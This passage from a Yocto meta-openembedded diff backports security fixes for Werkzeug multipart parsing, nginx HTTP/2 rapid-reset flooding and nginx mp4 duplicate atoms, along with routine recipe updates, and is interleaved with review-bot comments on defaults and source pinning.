max_parts=self.max_form_parts ++ ) + + fields = [] + files = [] +diff --git a/src/werkzeug/sansio/multipart.py b/src/werkzeug/sansio/multipart.py +index 2d54422..e7d742b 100644 +--- a/src/werkzeug/sansio/multipart.py ++++ b/src/werkzeug/sansio/multipart.py +@@ -83,10 +83,13 @@ class MultipartDecoder: + self, + boundary: bytes, + max_form_memory_size: Optional[int] = None, ++ *, ++ max_parts: Optional[int] = None, + ) -> None: + self.buffer = bytearray() + self.complete = False + self.max_form_memory_size = max_form_memory_size ++ self.max_parts = max_parts + self.state = State.PREAMBLE + self.boundary = boundary + +@@ -113,6 +116,7 @@ class MultipartDecoder: + % (LINE_BREAK, re.escape(boundary), LINE_BREAK, LINE_BREAK), + re.MULTILINE, + ) ++ self._parts_decoded = 0 + + def last_newline(self) -> int: + try: +@@ -177,6 +181,10 @@ class MultipartDecoder: + name=name, + ) + self.state = State.DATA ++ self._parts_decoded += 1 ++ ++ if self.max_parts is not None and self._parts_decoded > self.max_parts: ++ raise RequestEntityTooLarge() + + elif self.state == State.DATA: + if self.buffer.find(b"--" + self.boundary) == -1: +diff --git a/src/werkzeug/wrappers/request.py b/src/werkzeug/wrappers/request.py +index 57b739c..a6d5429 100644 +--- a/src/werkzeug/wrappers/request.py ++++ b/src/werkzeug/wrappers/request.py +@@ -83,6 +83,13 @@ class Request(_SansIORequest): + #: .. versionadded:: 0.5 + max_form_memory_size: t.Optional[int] = None + ++ #: The maximum number of multipart parts to parse, passed to ++ #: :attr:`form_data_parser_class`. Parsing form data with more than this ++ #: many parts will raise :exc:`~.RequestEntityTooLarge`. ++ #: ++ #: .. versionadded:: 2.2.3 ++ max_form_parts = 1000 ++ + #: The form data parser that should be used. Can be replaced to customize + #: the form date parsing. 
+ form_data_parser_class: t.Type[FormDataParser] = FormDataParser +@@ -246,6 +253,7 @@ class Request(_SansIORequest): + self.max_form_memory_size, + self.max_content_length, + self.parameter_storage_class, ++ max_form_parts=self.max_form_parts, + ) + + def _load_form_data(self) -> None: +diff --git a/tests/test_formparser.py b/tests/test_formparser.py +index 5fc803e..834324f 100644 +--- a/tests/test_formparser.py ++++ b/tests/test_formparser.py +@@ -127,6 +127,15 @@ class TestFormParser: + req.max_form_memory_size = 400 + assert req.form["foo"] == "Hello World" + ++ req = Request.from_values( ++ input_stream=io.BytesIO(data), ++ content_length=len(data), ++ content_type="multipart/form-data; boundary=foo", ++ method="POST", ++ ) ++ req.max_form_parts = 1 ++ pytest.raises(RequestEntityTooLarge, lambda: req.form["foo"]) ++ + def test_missing_multipart_boundary(self): + data = ( + b"--foo\r\nContent-Disposition: form-field; name=foo\r\n\r\n" +-- +2.40.0 diff --git a/meta-python/recipes-devtools/python/python3-werkzeug_2.1.1.bb b/meta-python/recipes-devtools/python/python3-werkzeug_2.1.1.bb index 476a3a5964..fc0789a73e 100644 --- a/meta-python/recipes-devtools/python/python3-werkzeug_2.1.1.bb +++ b/meta-python/recipes-devtools/python/python3-werkzeug_2.1.1.bb @@ -12,6 +12,9 @@ LIC_FILES_CHKSUM = "file://LICENSE.rst;md5=5dc88300786f1c214c1e9827a5229462" PYPI_PACKAGE = "Werkzeug" +SRC_URI += "file://CVE-2023-25577.patch \ + file://CVE-2023-23934.patch" + SRC_URI[sha256sum] = "f8e89a20aeabbe8a893c24a461d3ee5dad2123b05cc6abd73ceed01d39c3ae74" inherit pypi setuptools3 diff --git a/meta-python/recipes-extended/python-blivet/python3-blivetgui_2.3.0.bb b/meta-python/recipes-extended/python-blivet/python3-blivetgui_2.3.0.bb index 29e7a267d2..36ab065b51 100644 --- a/meta-python/recipes-extended/python-blivet/python3-blivetgui_2.3.0.bb +++ b/meta-python/recipes-extended/python-blivet/python3-blivetgui_2.3.0.bb 
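Review bot: The part limit is only enforced when a value is passed down. `FormDataParser.__init__` and `MultiPartParser.__init__` default `max_form_parts` to `None`, `MultipartDecoder.__init__` defaults `max_parts` to `None`, and the decoder skips the check when `self.max_parts is None`, so code that builds these parsers directly rather than through `Request` (class default 1000) still accepts an unbounded number of parts. The new `:param max_form_parts:` text in the `FormDataParser` docstring should say so, for example by appending `If None (the default), the number of parts is not limited.` Separately, `.. versionadded:: 2.2.3` on `Request.max_form_parts` is carried unchanged into a backport onto 2.1.1, which may mislead readers of the packaged docs about which builds have the limit. The class and function bodies around these inner hunks lie outside the patch.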
@@ -9,7 +9,7 @@ S = "${WORKDIR}/git" B = "${S}" SRCREV = "42512ee48494cee71febf04078d9774f0146a085" -SRC_URI = "git://github.com/storaged-project/blivet-gui.git;branch=master;protocol=https \ +SRC_URI = "git://github.com/storaged-project/blivet-gui.git;branch=main;protocol=https \ file://0001-Use-setuptools-instead-of-distutils-in-setup.py.patch \ file://0002-Use-symbolic-list-add-and-edit-icons.patch \ " diff --git a/meta-python/recipes-extended/python-cson/python3-cson_git.bb b/meta-python/recipes-extended/python-cson/python3-cson_git.bb index c4fcc61ec0..1187d12af8 100644 --- a/meta-python/recipes-extended/python-cson/python3-cson_git.bb +++ b/meta-python/recipes-extended/python-cson/python3-cson_git.bb @@ -12,8 +12,7 @@ SRC_URI = "git://github.com/gt3389b/python-cson.git;branch=master;protocol=https S = "${WORKDIR}/git" -RDEPENDS:${PN}:class-native = "" -DEPENDS:append:class-native = " python-native " +RDEPENDS:${PN} = "python3-json" inherit setuptools3 diff --git a/meta-python/recipes-extended/pywbemtools/python3-pywbemtools_1.0.0.bb b/meta-python/recipes-extended/pywbemtools/python3-pywbemtools_1.0.0.bb index 3a9f0ad6fd..976dd12d52 100644 --- a/meta-python/recipes-extended/pywbemtools/python3-pywbemtools_1.0.0.bb +++ b/meta-python/recipes-extended/pywbemtools/python3-pywbemtools_1.0.0.bb @@ -35,5 +35,3 @@ RDEPENDS:${PN}:class-target += "\ ${PYTHON_PN}-nocaselist \ ${PYTHON_PN}-custom-inherit \ " - -BBCLASSEXTEND = "native" diff --git a/meta-webserver/recipes-httpd/apache2/apache2_2.4.54.bb b/meta-webserver/recipes-httpd/apache2/apache2_2.4.58.bb index 37d498f52e..84b19de592 100644 --- a/meta-webserver/recipes-httpd/apache2/apache2_2.4.54.bb +++ b/meta-webserver/recipes-httpd/apache2/apache2_2.4.58.bb 
@@ -27,7 +27,7 @@ SRC_URI:append:class-target = " \ " LIC_FILES_CHKSUM = "file://LICENSE;md5=bddeddfac80b2c9a882241d008bb41c3" -SRC_URI[sha256sum] = "eb397feeefccaf254f8d45de3768d9d68e8e73851c49afd5b7176d1ecf80c340" +SRC_URI[sha256sum] = "fa16d72a078210a54c47dd5bef2f8b9b8a01d94909a51453956b3ec6442ea4c5" S = "${WORKDIR}/httpd-${PV}" @@ -35,7 +35,7 @@ inherit autotools update-rc.d pkgconfig systemd update-alternatives DEPENDS = "openssl expat pcre apr apr-util apache2-native " -CVE_PRODUCT = "http_server" +CVE_PRODUCT = "apache:http_server" SSTATE_SCAN_FILES += "apxs config_vars.mk config.nice" diff --git a/meta-webserver/recipes-httpd/apache2/files/apache2-volatile.conf b/meta-webserver/recipes-httpd/apache2/files/apache2-volatile.conf index ff2c587046..0852a8859a 100644 --- a/meta-webserver/recipes-httpd/apache2/files/apache2-volatile.conf +++ b/meta-webserver/recipes-httpd/apache2/files/apache2-volatile.conf @@ -1,2 +1,2 @@ -d /var/run/apache2 0755 root root - +d /run/apache2 0755 root root - d /var/log/apache2 0755 root root - diff --git a/meta-webserver/recipes-httpd/monkey/files/0001-fastcgi-Use-value-instead-of-address-of-sin6_port.patch b/meta-webserver/recipes-httpd/monkey/files/0001-fastcgi-Use-value-instead-of-address-of-sin6_port.patch new file mode 100644 index 0000000000..f4bab49aa7 --- /dev/null +++ b/meta-webserver/recipes-httpd/monkey/files/0001-fastcgi-Use-value-instead-of-address-of-sin6_port.patch 
@@ -0,0 +1,30 @@
+From 7f724bbafbb1e170401dd5de201273ab8c8bc75f Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Sun, 28 Aug 2022 14:24:02 -0700
+Subject: [PATCH] fastcgi: Use value instead of address of sin6_port
+
+This seems to be wrongly assigned where ipv4 sin_port is
+equated to address of sin6_port and not value of sin6_port
+
+Upstream-Status: Submitted [https://github.com/monkey/monkey/pull/375]
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ plugins/fastcgi/fcgi_handler.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/plugins/fastcgi/fcgi_handler.c b/plugins/fastcgi/fcgi_handler.c
+index 9e095e3c..e8e1eec1 100644
+--- a/plugins/fastcgi/fcgi_handler.c
++++ b/plugins/fastcgi/fcgi_handler.c
+@@ -245,7 +245,7 @@ static inline int fcgi_add_param_net(struct fcgi_handler *handler)
+ struct sockaddr_in *s4 = (struct sockaddr_in *)&addr4;
+ memset(&addr4, 0, sizeof(addr4));
+ addr4.sin_family = AF_INET;
+- addr4.sin_port = &s->sin6_port;
++ addr4.sin_port = s->sin6_port;
+ memcpy(&addr4.sin_addr.s_addr,
+ s->sin6_addr.s6_addr + 12,
+ sizeof(addr4.sin_addr.s_addr));
+--
+2.37.2
+
diff --git a/meta-webserver/recipes-httpd/monkey/monkey_1.6.9.bb b/meta-webserver/recipes-httpd/monkey/monkey_1.6.9.bb
index fff406a3f2..d3e22757c4 100644
--- a/meta-webserver/recipes-httpd/monkey/monkey_1.6.9.bb
+++ b/meta-webserver/recipes-httpd/monkey/monkey_1.6.9.bb
@@ -7,11 +7,13 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=2ee41112a44fe7014dce33e26468ba93" SECTION = "net" -SRC_URI = "http://monkey-project.com/releases/1.6/monkey-${PV}.tar.gz \ +SRC_URI = "git://github.com/monkey/monkey;branch=1.6;protocol=https \ + file://0001-fastcgi-Use-value-instead-of-address-of-sin6_port.patch \ file://monkey.service \ file://monkey.init" -SRC_URI[sha256sum] = "f1122e89cda627123286542b0a18fcaa131cbe9d4f5dd897d9455157289148fb" +SRCREV = "7999b487fded645381d387ec0e057e92407b0d2c" +S = "${WORKDIR}/git" UPSTREAM_CHECK_URI = "https://github.com/monkey/monkey/releases" UPSTREAM_CHECK_REGEX = "v(?P<pver>\d+(\.\d+)+).tar.gz" diff --git a/meta-webserver/recipes-httpd/nginx/files/0001-HTTP-2-per-iteration-stream-handling-limit.patch b/meta-webserver/recipes-httpd/nginx/files/0001-HTTP-2-per-iteration-stream-handling-limit.patch new file mode 100644 index 0000000000..7dd1e721c0 --- /dev/null +++ b/meta-webserver/recipes-httpd/nginx/files/0001-HTTP-2-per-iteration-stream-handling-limit.patch 
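Review bot: Nothing on the page ties the new `SRCREV` on `branch=1.6` to the 1.6.9 release named by the recipe, and the tarball `SRC_URI[sha256sum]` that previously pinned the release content is removed. A comment beside it stating what the commit is, for example `# SRCREV: <tag or position on branch 1.6, to be filled in by the author>`, would let a reviewer verify the pin against upstream. The unchanged `UPSTREAM_CHECK_URI` and `UPSTREAM_CHECK_REGEX` lines still match release tarballs; with a git fetcher the upstream version check presumably needs `UPSTREAM_CHECK_GITTAGREGEX` instead, which is worth confirming so that new upstream releases keep being noticed.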
@@ -0,0 +1,92 @@
+From 2b9667f36551406169e3e2a6a774466ac70a83c0 Mon Sep 17 00:00:00 2001
+From: Maxim Dounin <mdounin@mdounin.ru>
+Date: Tue, 10 Oct 2023 15:13:39 +0300
+Subject: [PATCH] HTTP/2: per-iteration stream handling limit.
+
+To ensure that attempts to flood servers with many streams are detected
+early, a limit of no more than 2 * max_concurrent_streams new streams per one
+event loop iteration was introduced. This limit is applied even if
+max_concurrent_streams is not yet reached - for example, if corresponding
+streams are handled synchronously or reset.
+
+Further, refused streams are now limited to maximum of max_concurrent_streams
+and 100, similarly to priority_limit initial value, providing some tolerance
+to clients trying to open several streams at the connection start, yet
+low tolerance to flooding attempts.
+
+Upstream-Status: Backport
+[https://github.com/nginx/nginx/commit/6ceef192e7af1c507826ac38a2d43f08bf265fb9]
+
+Reduces the impact of HTTP/2 Stream Reset flooding in the nginx product
+(CVE-2023-44487).
+
+See: https://www.nginx.com/blog/http-2-rapid-reset-attack-impacting-f5-nginx-products/
+
+This patch only reduces the impact and does not completely mitigate the CVE
+in question, the latter being due to a design flaw in the HTTP/2 protocol
+itself. For transparancy reasons I therefore opted to not mark the
+CVE as resolved, so that integrators can decide for themselves, wheither to
+enable HTTP/2 support or allow HTTP/1.1 connections only.
+
+Signed-off-by: Jasper Orschulko <jasper@fancydomain.eu>
+---
+ src/http/v2/ngx_http_v2.c | 15 +++++++++++++++
+ src/http/v2/ngx_http_v2.h | 2 ++
+ 2 files changed, 17 insertions(+)
+
+diff --git a/src/http/v2/ngx_http_v2.c b/src/http/v2/ngx_http_v2.c
+index 3611a2e50..291677aca 100644
+--- a/src/http/v2/ngx_http_v2.c
++++ b/src/http/v2/ngx_http_v2.c
+@@ -361,6 +361,7 @@ ngx_http_v2_read_handler(ngx_event_t *rev)
+ ngx_log_debug0(NGX_LOG_DEBUG_HTTP, c->log, 0, "http2 read handler");
+
+ h2c->blocked = 1;
++ h2c->new_streams = 0;
+
+ if (c->close) {
+ c->close = 0;
+@@ -1320,6 +1321,14 @@ ngx_http_v2_state_headers(ngx_http_v2_connection_t *h2c, u_char *pos,
+ goto rst_stream;
+ }
+
++ if (h2c->new_streams++ >= 2 * h2scf->concurrent_streams) {
++ ngx_log_error(NGX_LOG_INFO, h2c->connection->log, 0,
++ "client sent too many streams at once");
++
++ status = NGX_HTTP_V2_REFUSED_STREAM;
++ goto rst_stream;
++ }
++
+ if (!h2c->settings_ack
+ && !(h2c->state.flags & NGX_HTTP_V2_END_STREAM_FLAG)
+ && h2scf->preread_size < NGX_HTTP_V2_DEFAULT_WINDOW)
+@@ -1385,6 +1394,12 @@ ngx_http_v2_state_headers(ngx_http_v2_connection_t *h2c, u_char *pos,
+
+ rst_stream:
+
++ if (h2c->refused_streams++ > ngx_max(h2scf->concurrent_streams, 100)) {
++ ngx_log_error(NGX_LOG_INFO, h2c->connection->log, 0,
++ "client sent too many refused streams");
++ return ngx_http_v2_connection_error(h2c, NGX_HTTP_V2_NO_ERROR);
++ }
++
+ if (ngx_http_v2_send_rst_stream(h2c, h2c->state.sid, status) != NGX_OK) {
+ return ngx_http_v2_connection_error(h2c, NGX_HTTP_V2_INTERNAL_ERROR);
+ }
+diff --git a/src/http/v2/ngx_http_v2.h b/src/http/v2/ngx_http_v2.h
+index 349229711..6a7aaa62c 100644
+--- a/src/http/v2/ngx_http_v2.h
++++ b/src/http/v2/ngx_http_v2.h
+@@ -125,6 +125,8 @@ struct ngx_http_v2_connection_s {
+ ngx_uint_t processing;
+ ngx_uint_t frames;
+ ngx_uint_t idle;
++ ngx_uint_t new_streams;
++ ngx_uint_t refused_streams;
+ ngx_uint_t priority_limit;
+
+ ngx_uint_t pushing;
+--
+2.42.1
+
diff --git a/meta-webserver/recipes-httpd/nginx/files/0001-configure-libxslt-conf.patch b/meta-webserver/recipes-httpd/nginx/files/0001-configure-libxslt-conf.patch
new file mode 100644
index 0000000000..7ba2a1fb85
--- /dev/null
+++ b/meta-webserver/recipes-httpd/nginx/files/0001-configure-libxslt-conf.patch
@@ -0,0 +1,39 @@
+From 0c3c669464a514cf8d0cac08282ecb2b486f440f Mon Sep 17 00:00:00 2001
+From: Joe Slater <joe.slater@windriver.com>
+Date: Tue, 3 Oct 2023 19:21:17 +0000
+Subject: [PATCH] configure: libxslt conf
+
+Modify to find libxslt related include files under sysroot.
+
+Upstream-Status: Pending
+
+Signed-off-by: Joe Slater <joe.slater@windriver.com>
+---
+ auto/lib/libxslt/conf | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/auto/lib/libxslt/conf b/auto/lib/libxslt/conf
+index 3063ac7..eb77886 100644
+--- a/auto/lib/libxslt/conf
++++ b/auto/lib/libxslt/conf
+@@ -12,7 +12,7 @@
+ #include <libxslt/xsltInternals.h>
+ #include <libxslt/transform.h>
+ #include <libxslt/xsltutils.h>"
+- ngx_feature_path="/usr/include/libxml2"
++ ngx_feature_path="=/usr/include/libxml2"
+ ngx_feature_libs="-lxml2 -lxslt"
+ ngx_feature_test="xmlParserCtxtPtr ctxt = NULL;
+ xsltStylesheetPtr sheet = NULL;
+@@ -100,7 +100,7 @@ fi
+ ngx_feature_name=NGX_HAVE_EXSLT
+ ngx_feature_run=no
+ ngx_feature_incs="#include <libexslt/exslt.h>"
+- ngx_feature_path="/usr/include/libxml2"
++ ngx_feature_path="=/usr/include/libxml2"
+ ngx_feature_libs="-lexslt"
+ ngx_feature_test="exsltRegisterAll();"
+ . auto/feature
+--
+2.35.5
+
diff --git a/meta-webserver/recipes-httpd/nginx/files/CVE-2022-41741-CVE-2022-41742.patch b/meta-webserver/recipes-httpd/nginx/files/CVE-2022-41741-CVE-2022-41742.patch
new file mode 100644
index 0000000000..d151256b37
--- /dev/null
+++ b/meta-webserver/recipes-httpd/nginx/files/CVE-2022-41741-CVE-2022-41742.patch
@@ -0,0 +1,319 @@ +From 91a3b5302d6a2467df70d3b43450991a53f9946b Mon Sep 17 00:00:00 2001 +From: Hitendra Prajapati <hprajapati@mvista.com> +Date: Wed, 16 Nov 2022 11:24:25 +0530 +Subject: [PATCH] CVE-2022-41741, CVE-2022-41742 + +Upstream-Status: Backport [https://github.com/nginx/nginx/commit/6b022a5556af22b6e18532e547a6ae46b0d8c6ea] +CVE: CVE-2022-41741, CVE-2022-41742 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> + +Mp4: disabled duplicate atoms. + +Most atoms should not appear more than once in a container. Previously, +this was not enforced by the module, which could result in worker process +crash, memory corruption and disclosure. +--- + src/http/modules/ngx_http_mp4_module.c | 147 +++++++++++++++++++++++++ + 1 file changed, 147 insertions(+) + +diff --git a/src/http/modules/ngx_http_mp4_module.c b/src/http/modules/ngx_http_mp4_module.c +index 0e93fbd..4f4d89d 100644 +--- a/src/http/modules/ngx_http_mp4_module.c ++++ b/src/http/modules/ngx_http_mp4_module.c +@@ -1070,6 +1070,12 @@ ngx_http_mp4_read_ftyp_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + return NGX_ERROR; + } + ++ if (mp4->ftyp_atom.buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 ftyp atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + atom_size = sizeof(ngx_mp4_atom_header_t) + (size_t) atom_data_size; + + ftyp_atom = ngx_palloc(mp4->request->pool, atom_size); +@@ -1128,6 +1134,12 @@ ngx_http_mp4_read_moov_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + return NGX_DECLINED; + } + ++ if (mp4->moov_atom.buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 moov atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + conf = ngx_http_get_module_loc_conf(mp4->request, ngx_http_mp4_module); + + if (atom_data_size > mp4->buffer_size) { +@@ -1195,6 +1207,12 @@ ngx_http_mp4_read_mdat_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + + ngx_log_debug0(NGX_LOG_DEBUG_HTTP, mp4->file.log, 0, 
"mp4 mdat atom"); + ++ if (mp4->mdat_atom.buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 mdat atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + data = &mp4->mdat_data_buf; + data->file = &mp4->file; + data->in_file = 1; +@@ -1321,6 +1339,12 @@ ngx_http_mp4_read_mvhd_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + + ngx_log_debug0(NGX_LOG_DEBUG_HTTP, mp4->file.log, 0, "mp4 mvhd atom"); + ++ if (mp4->mvhd_atom.buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 mvhd atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + atom_header = ngx_mp4_atom_header(mp4); + mvhd_atom = (ngx_mp4_mvhd_atom_t *) atom_header; + mvhd64_atom = (ngx_mp4_mvhd64_atom_t *) atom_header; +@@ -1586,6 +1610,13 @@ ngx_http_mp4_read_tkhd_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + atom_size = sizeof(ngx_mp4_atom_header_t) + (size_t) atom_data_size; + + trak = ngx_mp4_last_trak(mp4); ++ ++ if (trak->out[NGX_HTTP_MP4_TKHD_ATOM].buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 tkhd atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + trak->tkhd_size = atom_size; + + ngx_mp4_set_32value(tkhd_atom->size, atom_size); +@@ -1624,6 +1655,12 @@ ngx_http_mp4_read_mdia_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + + trak = ngx_mp4_last_trak(mp4); + ++ if (trak->out[NGX_HTTP_MP4_MDIA_ATOM].buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 mdia atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + atom = &trak->mdia_atom_buf; + atom->temporary = 1; + atom->pos = atom_header; +@@ -1747,6 +1784,13 @@ ngx_http_mp4_read_mdhd_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + atom_size = sizeof(ngx_mp4_atom_header_t) + (size_t) atom_data_size; + + trak = ngx_mp4_last_trak(mp4); ++ ++ if (trak->out[NGX_HTTP_MP4_MDHD_ATOM].buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 mdhd atom in 
\"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + trak->mdhd_size = atom_size; + trak->timescale = timescale; + +@@ -1789,6 +1833,12 @@ ngx_http_mp4_read_hdlr_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + + trak = ngx_mp4_last_trak(mp4); + ++ if (trak->out[NGX_HTTP_MP4_HDLR_ATOM].buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 hdlr atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + atom = &trak->hdlr_atom_buf; + atom->temporary = 1; + atom->pos = atom_header; +@@ -1817,6 +1867,12 @@ ngx_http_mp4_read_minf_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + + trak = ngx_mp4_last_trak(mp4); + ++ if (trak->out[NGX_HTTP_MP4_MINF_ATOM].buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 minf atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + atom = &trak->minf_atom_buf; + atom->temporary = 1; + atom->pos = atom_header; +@@ -1860,6 +1916,15 @@ ngx_http_mp4_read_vmhd_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + + trak = ngx_mp4_last_trak(mp4); + ++ if (trak->out[NGX_HTTP_MP4_VMHD_ATOM].buf ++ || trak->out[NGX_HTTP_MP4_SMHD_ATOM].buf) ++ { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 vmhd/smhd atom in \"%s\"", ++ mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + atom = &trak->vmhd_atom_buf; + atom->temporary = 1; + atom->pos = atom_header; +@@ -1891,6 +1956,15 @@ ngx_http_mp4_read_smhd_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + + trak = ngx_mp4_last_trak(mp4); + ++ if (trak->out[NGX_HTTP_MP4_VMHD_ATOM].buf ++ || trak->out[NGX_HTTP_MP4_SMHD_ATOM].buf) ++ { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 vmhd/smhd atom in \"%s\"", ++ mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + atom = &trak->smhd_atom_buf; + atom->temporary = 1; + atom->pos = atom_header; +@@ -1922,6 +1996,12 @@ ngx_http_mp4_read_dinf_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + + trak = 
ngx_mp4_last_trak(mp4); + ++ if (trak->out[NGX_HTTP_MP4_DINF_ATOM].buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 dinf atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + atom = &trak->dinf_atom_buf; + atom->temporary = 1; + atom->pos = atom_header; +@@ -1950,6 +2030,12 @@ ngx_http_mp4_read_stbl_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + + trak = ngx_mp4_last_trak(mp4); + ++ if (trak->out[NGX_HTTP_MP4_STBL_ATOM].buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 stbl atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + atom = &trak->stbl_atom_buf; + atom->temporary = 1; + atom->pos = atom_header; +@@ -2018,6 +2104,12 @@ ngx_http_mp4_read_stsd_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + + trak = ngx_mp4_last_trak(mp4); + ++ if (trak->out[NGX_HTTP_MP4_STSD_ATOM].buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 stsd atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + atom = &trak->stsd_atom_buf; + atom->temporary = 1; + atom->pos = atom_header; +@@ -2086,6 +2178,13 @@ ngx_http_mp4_read_stts_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + atom_end = atom_table + entries * sizeof(ngx_mp4_stts_entry_t); + + trak = ngx_mp4_last_trak(mp4); ++ ++ if (trak->out[NGX_HTTP_MP4_STTS_ATOM].buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 stts atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + trak->time_to_sample_entries = entries; + + atom = &trak->stts_atom_buf; +@@ -2291,6 +2390,13 @@ ngx_http_mp4_read_stss_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + "sync sample entries:%uD", entries); + + trak = ngx_mp4_last_trak(mp4); ++ ++ if (trak->out[NGX_HTTP_MP4_STSS_ATOM].buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 stss atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + trak->sync_samples_entries = entries; + + 
atom_table = atom_header + sizeof(ngx_http_mp4_stss_atom_t); +@@ -2489,6 +2595,13 @@ ngx_http_mp4_read_ctts_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + "composition offset entries:%uD", entries); + + trak = ngx_mp4_last_trak(mp4); ++ ++ if (trak->out[NGX_HTTP_MP4_CTTS_ATOM].buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 ctts atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + trak->composition_offset_entries = entries; + + atom_table = atom_header + sizeof(ngx_mp4_ctts_atom_t); +@@ -2692,6 +2805,13 @@ ngx_http_mp4_read_stsc_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + atom_end = atom_table + entries * sizeof(ngx_mp4_stsc_entry_t); + + trak = ngx_mp4_last_trak(mp4); ++ ++ if (trak->out[NGX_HTTP_MP4_STSC_ATOM].buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 stsc atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + trak->sample_to_chunk_entries = entries; + + atom = &trak->stsc_atom_buf; +@@ -3024,6 +3144,13 @@ ngx_http_mp4_read_stsz_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + "sample uniform size:%uD, entries:%uD", size, entries); + + trak = ngx_mp4_last_trak(mp4); ++ ++ if (trak->out[NGX_HTTP_MP4_STSZ_ATOM].buf) { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 stsz atom in \"%s\"", mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + trak->sample_sizes_entries = entries; + + atom_table = atom_header + sizeof(ngx_mp4_stsz_atom_t); +@@ -3207,6 +3334,16 @@ ngx_http_mp4_read_stco_atom(ngx_http_mp4_file_t *mp4, uint64_t atom_data_size) + atom_end = atom_table + entries * sizeof(uint32_t); + + trak = ngx_mp4_last_trak(mp4); ++ ++ if (trak->out[NGX_HTTP_MP4_STCO_ATOM].buf ++ || trak->out[NGX_HTTP_MP4_CO64_ATOM].buf) ++ { ++ ngx_log_error(NGX_LOG_ERR, mp4->file.log, 0, ++ "duplicate mp4 stco/co64 atom in \"%s\"", ++ mp4->file.name.data); ++ return NGX_ERROR; ++ } ++ + trak->chunks = entries; + + atom = &trak->stco_atom_buf; +@@ 
